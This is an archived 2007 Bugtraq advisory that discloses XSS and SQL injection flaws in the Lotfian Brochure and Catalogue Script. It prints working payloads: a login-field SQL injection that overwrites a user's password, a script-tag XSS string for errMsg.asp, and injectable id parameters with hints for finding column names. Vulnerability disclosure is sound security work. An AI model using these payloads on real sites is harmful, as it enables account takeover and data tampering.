Lotfian Brochure and cataloge Script XSS And SQL Injection

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Lotfian Brochure and cataloge Script XSS And SQL Injection
From: noreply@xxxxxxxxxxxxxxxxx
Date: 3 Dec 2007 03:23:26 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Aria-Security Team
http://Aria-Security.Net
----------------------------------------
Lotfian Brochure and cataloge Script XSS And SQL Injection 
Original Advisory @ http://aria-security.net/forum/showthread.php?p=1135

Username/Password Field can run SQL Queries, 
For Example I got these:

Consumer.ConsumerID
Consumer.ConsumerName'
Consumer.ConsumerUserName
Consumer.ConsumerPassword
Consumer.Consumer

Use Something like:
'update Consumer set Consumer.ConsumerPassword='hacked' where 
(ConsumerID='1');--

to update what you need


[XSS]
errMsg.asp?msg="><script>alert('Aria-Security')</script> 

[Other Advanced SQL Injection]

* AboutUs.asp?id=-1'
Unclosed quotation mark? use it.
*SubCategory.asp?ID=-1'
Unclosed quotation mark? use it.

HINT: suppose the first column name is a.BrochureName

Credits Goes to Aria-Security Team
Regards,
The-0utl4w

Prev by Date: PR06-09: BEA Plumtree portal full version disclosure vulnerability
Next by Date: sing (debian) vunlerability?
Previous by thread: PR06-09: BEA Plumtree portal full version disclosure vulnerability
Next by thread: sing (debian) vunlerability?
Index(es):
- Date
- Thread